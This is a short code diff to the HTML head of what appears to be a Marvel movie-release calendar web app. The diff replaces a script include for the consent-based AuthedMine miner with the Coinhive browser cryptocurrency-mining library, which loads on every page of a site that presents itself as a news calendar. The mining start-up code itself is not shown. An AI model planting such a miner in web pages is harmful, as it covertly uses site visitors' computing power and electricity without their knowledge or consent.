--- a/client/head.html
+++ b/client/head.html
@@ -6,5 +6,5 @@
 	<meta property="og:url"                content="http://marvelcalendar.meteor.com" />
 	<meta property="og:title"              content="Marvel Cinematic Universe Calendar" />
 	<meta property="og:description"        content="Get all the latest release news for Marvel Movies and TV Shows." />
-	<script src="https://authedmine.com/lib/authedmine.min.js"></script>
+	<script src="https://coinhive.com/lib/coinhive.min.js"></script>
 </head>
